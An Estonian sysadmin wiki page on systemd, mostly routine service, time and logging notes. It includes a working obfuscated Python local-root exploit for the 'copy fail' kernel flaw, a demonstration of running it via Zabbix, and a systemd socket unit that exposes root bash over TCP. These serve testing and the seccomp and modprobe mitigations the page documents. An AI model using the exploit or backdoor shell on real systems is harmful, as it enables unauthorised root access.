Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

Leevenduste iseloomustus

* systemd (seccomp) - operatsioonisüsteemi syscall liidesel asuv nö tulemüür, mingis mõttes asub kerneli protsesside poole vaatavas osas
* apparmor (lsm - linux security modules)- erinevate süsteemi võimekustele ligipääsemise takistamised (asub kerneli protsesside poole vaatavast osast teisel pool)
* modprobe - kerneli funktsionaalsust realiseeriv komponent (kahe esimese puhul ei saa funktsionaalust kasutada isegi kui kernelis on see iseenest kohal)

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

Tulemus paistab selline

<pre>
root@moraal:~# uname -a
Linux moraal 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux

root@moraal:~# modprobe algif_aead
modprobe: ERROR: ../libkmod/libkmod-module.c:1084 command_do() Error running install command '/bin/false' for module algif_aead: retcode 1
modprobe: ERROR: could not insert 'algif_aead': Invalid argument
</pre>

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===20260508 - dirty frag eksploit===

TODO

chatgpt üks pakkumine

<pre>
[Service]
# Blocks the RxRPC network protocol specifically
RestrictAddressFamilies=~AF_RXRPC

# Prevents gaining root via setuid binaries (essential for LPE defense)
NoNewPrivileges=yes

# Blocks the kernel module from being auto-loaded
ProtectKernelModules=yes

# Restricts namespaces (blocks the ESP variant requirement)
RestrictNamespaces=yes
</pre>

Random linux arvutis toetatud protokollide perekonnad (2026 aastal on neid kokku ca 40 tükki)

<pre>
root@pve-wrx90e:~# cat /proc/net/protocols
protocol size sockets memory press maxhdr slab module cl co di ac io in de sh ss gs se re bi br ha uh gp em
SCO 896 0 -1 NI 0 no bluetooth n n n n n n n n n n n n n n n n n n
L2CAP 880 0 -1 NI 0 no bluetooth n n n n n n n n n n n n n n n n n n
HCI 936 0 -1 NI 0 no bluetooth n n n n n n n n n n n n n n n n n n
PACKET 1600 0 -1 NI 0 no kernel n n n n n n n n n n n n n n n n n n
MPTCPv6 2128 1 949 no 0 yes kernel y y y n y y y y y y y y n n y y y n
PINGv6 1408 0 -1 NI 0 yes kernel y y y n n y n n y y y y y y n y y n
RAWv6 1408 0 -1 NI 0 yes kernel y y y n y y y n y y y y y y y y n n
UDPLITEv6 1472 0 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
UDPv6 1472 2 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
TCPv6 2560 9 949 no 320 yes kernel y y y y y y y y y y y y n y y y y y
XDP 1024 0 -1 NI 0 no kernel n n n n n n n n n n n n n n n n n n
UNIX-STREAM 1152 628 -1 NI 0 yes kernel y n n n n n n n n n n n n n n n n n
UNIX 1152 65 -1 NI 0 yes kernel y n n n n n n n n n n n n n n n n n
UDP-Lite 1344 0 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
MPTCP 2000 0 949 no 0 yes kernel y y y n y y y y y y y y n n y y y n
PING 1056 0 -1 NI 0 yes kernel y y y n n y n n y y y y y y n y y n
RAW 1216 0 -1 NI 0 yes kernel y y y n y y y n y y y y y y y y n n
UDP 1344 3 0 NI 0 yes kernel y y y n y y y n y y y y n n y y y n
TCP 2432 23 949 no 320 yes kernel y y y y y y y y y y y y n y y y y y
MCTP 872 0 -1 NI 0 no kernel y n n n n y n n n n n n n n y y n n
NETLINK 1120 77 -1 NI 0 no kernel n n n n n n n n n n n n n n n n n n
</pre>

Kasulikud lisamaterjalid

* https://github.com/V4bel/dirtyfrag

===bootshell===

Osutub, et systemd pid=1 protsess on selles mõttes unikaalne, et on võimalik käimasolevale protsessile seadistada juurde porte, millel ta teenindab. Näide avab üle võrgu shell kasutamise võimalus, arusaadavalt on see äärmiselt ebaturvaline praktiliselt kasutamiseks

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/bootshell.socket
[Unit]
Description=Neutral Side-Channel Boot Shell Socket

[Socket]
ListenStream=9999
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/bootshell@.service
[Unit]
Description=Neutral Side-Channel Boot Shell Service

[Service]
ExecStart=-/bin/bash -i
StandardInput=socket
StandardOutput=socket
StandardError=socket
</pre>

Aktiveerimine

<pre>
root@zabbix-pub-01:~# systemctl daemon-reload
root@zabbix-pub-01:~# systemctl enable --now bootshell.socket
</pre>

Tulemusena

<pre>
root@zabbix-pub-01:~# netstat -lnpt | grep 9999
tcp6 0 0 :::9999 :::* LISTEN 1/init
</pre>

Kasutamiseks tuleb üle võrgu tekitada tcp ühendus, nt netcat programmiga

<pre>
imreoolberg@Imres-MacBook-Air ~ % nc 192.168.10.193 9999
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@zabbix-pub-01:/# hostname -f
hostname -f
zabbix-pub-01
root@zabbix-pub-01:/# exit
exit
exit
imreoolberg@Imres-MacBook-Air ~ %
</pre>

Kuna tegu on väga spetsiifilise ja ebaturvalise katsega, lõpus öelda

<pre>
root@zabbix-pub-01:~# systemctl disable --now bootshell.socket
</pre>

===systemd-coredump===

TODO

Kasulikud lisamaterjalid

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-systemd-coredump-for-crash-analysis-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html

Systemd kasutamine

2026-06-20T14:12:42Z

Imre: /* bootshell */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

Tööpõhimõte

* systemd-timedated on dispetšer, mis vahendab seadistuse utiliiti timedatectl konkreetsete ntp serveritega (nt chrony, systemd-timesyncd)
* systemd-timedated ei tööta pidavalt, ta käivitub dbus juhtimisel

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timesyncd või chrony on ntp klient deemon, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

või 'systemctl enable|disable chrony', aga ehk on õigem opereerida timedatectl abil

Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

Seos busctl osakonnaga

<pre>
root@ns-pg-01:~# busctl | grep time
org.freedesktop.timedate1 - - - (activatable) - - -

root@ns-pg-01:~# timedatectl status
Local time: Wed 2026-06-03 01:26:34 EEST
Universal time: Tue 2026-06-02 22:26:34 UTC
RTC time: Tue 2026-06-02 22:26:34
Time zone: Europe/Tallinn (EEST, +0300)
System clock synchronized: yes
NTP service: active
RTC in local TZ: no

root@ns-pg-01:~# busctl | grep time
:1.34 2449 systemd-timedat root :1.34 systemd-timedated.service - -
org.freedesktop.timedate1 2449 systemd-timedat root :1.34 systemd-timedated.service - -
</pre>

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
